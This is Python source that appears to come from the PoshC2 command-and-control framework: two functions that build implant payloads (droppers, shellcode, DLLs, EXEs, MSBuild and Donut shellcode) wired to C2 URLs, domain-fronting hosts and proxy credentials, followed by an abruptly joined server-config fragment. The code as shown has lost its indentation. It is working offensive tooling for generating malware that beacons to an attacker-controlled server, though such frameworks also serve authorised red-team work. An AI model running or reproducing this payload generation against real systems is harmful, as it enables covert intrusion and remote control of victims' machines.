def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")
comms_url, PayloadCommsHostCount = string_to_array(comms_url)
domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
if PayloadCommsHostCount == DomainFrontHeaderCount:
pass
else:
print("[-] Error - different number of host headers and URLs")
input("Press Enter to continue...")
clear()
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
else:
imurl = get_newimplanturl()
C2 = get_c2server_all()
urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)
if shellcodeOnly:
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
else:
newPayload.CreateAll("%s_" % name)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
daisyurl = input(f"Daisy URL: e.g. {default_url} ")
if ("http://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
if ("https://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
pbindsecret = PBindSecret
pbindpipename = PBindPipeName
daisyurl, daisyurl_count = string_to_array(daisyurl)
daisyhostheader = ""
c = 0
daisyurls = daisyurl.split(",")
for url in daisyurls:
if c > 0:
daisyhostheader += ",\"\""
else:
daisyhostheader += "\"\""
c += 1
C2 = get_c2server_all()
urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
"", "", "")
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
PowerShellProxyCommand=proxynone,
URLID=urlId,
PBindPipeName=pbindpipename,
PBindSecret=pbindsecret)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (daisyurl),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreateDonutShellcode("%s_" % name)
newPayload.BuildDynamicPayloads("%s_" % name)
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
ImagesDirectory = f"{ResourcesDirectory}images/"
PayloadModulesDirectory = f"{PoshInstallDirectory}/poshc2/server/payloads/"
# Database Config
if config["DatabaseType"].lower() == "sqlite":
DatabaseType = DBType.SQLite
Database = f"{PoshProjectDirectory}PowershellC2.SQLite"
elif config["DatabaseType"].lower() == 'postgres':
DatabaseType = DBType.Postgres
Database = config["PostgresConnectionString"]
else:
raise Exception(
f"Invalid configuration: DatabaseType must be Postgres or SQLite: {DatabaseType}"
)
PayloadCommsHostString, PayloadCommsHostCount = string_to_array(
config["PayloadCommsHost"])
DomainFrontHeaderString, DomainFrontHeaderCount = string_to_array(
config["DomainFrontHeader"])
if PayloadCommsHostCount != DomainFrontHeaderCount:
raise Exception(
"[-] Error - different number of host headers and URLs in config.yml")
# Server Config
BindIP = config["BindIP"]
BindPort = config["BindPort"]
# Payload Comms
PayloadCommsHost = PayloadCommsHostString
DomainFrontHeader = DomainFrontHeaderString
Referrer = config["Referrer"]
ServerHeader = config["ServerHeader"]
UserAgent = config["UserAgent"]